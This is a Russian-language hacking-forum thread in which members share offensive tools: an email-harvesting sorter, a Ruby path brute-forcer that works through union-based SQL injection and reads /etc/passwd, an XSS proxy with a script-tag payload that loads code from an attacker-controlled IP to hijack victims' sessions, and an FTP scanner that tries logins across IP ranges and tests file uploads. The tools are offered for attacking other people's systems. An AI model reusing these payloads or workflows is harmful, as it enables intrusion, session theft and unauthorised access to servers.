Программы для выполнения нужных рутинных действий автоматизации

Discussion in 'Инструменты' started by randman, 13 Jan 2013.

  1. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Тема тестовая. Различные парсеры/чекеры, использование которых другими людьми будет необходимо. Кроссплатформенное ПО с исходным кодом и свободной лицензией приветствуется :)
     
  2. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    (Autoit)
    Сортирует Email
    удаляет дубликаты.( на выходе)
    Создает директорию \mail
    сортирует по файлам
    яндекс - yandex.txt и т.д
    пункт Автомат для распостраненных email:
    mail.ru
    yandex.ru
    gmail.com
    aol.com
    yahoo.com

    пункт Свой email для других сервисов email.(создает mail.txt)
    [​IMG]
    Ссылка

    Добавил *.html.
    Добавил модуль, теперь может вытаскивать мыло из 'мусора'.
     
    #2 vasykas, 13 Jan 2013
    Last edited: 22 Jan 2017
    to.Index, jettor, fckffnzscm and 5 others like this.
  3. vadakoff

    vadakoff New Member

    Joined:
    20 Jan 2011
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Перборщик путей/скриптов в раскрученной скуле

    Тулза ищет физические пути до скриптов на *nix серверах, работает с UnionBased.
    Принимет три параметра:

    1. (Обязателен) -u Передать в качестве значения урл вида
    http://www.vulnerhost.com/index.php?id=3+union+all+select+1,2,3,%POINT%,4,5--
    где "%POINT%" точка полезной нагрузки.
    Значение этого параметра рекомендуется обрамлять в двойные кавычки.

    2. (Опционально) -p Указывает кастомный префих путей, пример
    /пиздец/как/далеко/до/сервера
    в итоге будут сгенерированиы такие пути:
    /пиздец/как/далеко/до/сервера/public_html/index.php
    /пиздец/как/далеко/до/сервера/httpdocs/info.php
    /пиздец/как/далеко/до/сервера/index.html
    ...
    Если не указывать эту опцию, первым будет парсится /etc/passwd.

    3. (Опционально) -g Сгенерировать список путей и выйти без дальнейшего брута

    Во время брута если файл нашелся складывает результат в файл log.log, если нет
    то просто отображает "%" или "~" если произошла ошибка запроса.

    Запускать примерно так:
    c:\jruby-1.7.16.1\bin\jruby.exe bruteforce.rb
    но думаю что на не джава руби тоже покатит т.к. основные либы совместимы у них

    Писал на стадии изучения руби, поэтому за кривой код особо не ругать :).

    Ссылка
     
    ArmusIAm likes this.
  4. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    XSS proxy написанный на php + js (супер сырая недопиленная бета)
    выкладываю так как пока нет времени на допиливание, насчет быдлокода не пинайте а лучше конструктивно критикуйте с рабочими исправлениями

    Из плюсов:
    Минимальные требование (apache + mod_rewrite + php + js)
    Весит очень мало
    Прост в использовании

    Что покачто недопиленно:
    Динамическая обфускация JS (шоб не палилось антивирусами как beef)
    Мультисессионность (начал пилить)
    Очередь запросов
    POST запросы с multipart-form-data
    Не тестирвоалась кроссбраузерность
    В админке у сессий не видно ссылки на которых находится жертва.

    Тестовая сборка:
    http://46.101.153.64/admin.php

    Как юзать?
    Втыкаем в своем браузере проксю 46.101.153.64:80 (логин и пароль test:test)
    Атакуем когонить с XSS пейлоадом <script src="http://46.101.153.64/xss.php"></script>
    обновляем admin.php пока в нем не появится сессия, далее пытаемся открыть сайт на котором находится жертва.


    Сорцы зааплоажу когда заработает аплоад файлов(
     
    #4 psihoz26, 22 Apr 2016
    Last edited: 22 Apr 2016
    st55 likes this.
  5. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    интересно было бы поюзать :)
    апните плиз когда допилите
    сейчас в админке ошибки валятся
     
    _________________________
  6. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    пришли текст ошибки плз
     
  7. Best-Man

    Best-Man New Member

    Joined:
    22 Jan 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Перезалейте файл. Удалили.
     
  8. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
  9. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    Переделал программку.
    Чекает ФТП:
    по диапазону ip (xx.xx.xx.xx-xx.xx.xx.xx)
    или берем готовые
    ip из файла.
    Логин пароль
    можно выбрать свои.

    [​IMG]
    Добавил проверку заливки файла.
    Добавляем:
    из списка теста
    или
    из файла



    ошибки вроде исправил.
    Замечания, предложения учту.

    Ссылка.
     
    #9 vasykas, 29 Mar 2017
    Last edited: 6 Apr 2017
    sha9 likes this.
  10. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    скачал програмку из любопытства. на первый взгляд - понравилась. но нельзя-ли немного уточнить некоторый вопросы?
    1.как я понял, auth говорит о том, что авторизация прошла успешно?
    2.не совсем понятно во вкладке test upload пункт фтп спискок->вставить. пытался вставлять различными способами и ничего не происходит. список из фтп скана не вставляется в данный пункт?не могли-бы разъяснить основные принципы работы с программой или дать ссылку на ранние пояснения? по поиску не нашел.
    3.если вы будете дорабатывать программу, нельзя-ли сделать расширяемый интерфейс? а то на нетбуке, к примеру не совсем удобно. окно не сжимается и не удобно немного пользоваться ею...
     
  11. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    auth - если пара логин/пароль установленные в программе не подходят.
    Good - Удачная авторизация.
    Во вкладке test upload пункт фтп спискок и из файла выводится количество Good внизу в статус баре Всего:.(на экран выводятся только удачные заливки и пути)
    В ближайшее время доработаю
     
  12. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    во-блин...а я-то думал,что тема умерла,а автор забросил проект... чисто случайно зашел. теперь буду почаще наведываться...
    спасибо за ответ. программа действительно понравилась. главное - не пропустить обновление,если вы еще ее не забросили.
    вопрос-не планируете включить в программу пробивку по эксплойтам,кроме простого брута по паролям?
    и еще один вопрос - новая версия программы еще не вышла?
     
    #12 sha9, 3 Aug 2017
    Last edited: 10 Aug 2017
  13. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    Да не. проще отдельно написать.(тут брута нет просто вход по дефолту или какие введешь.)
     
    sha9 likes this.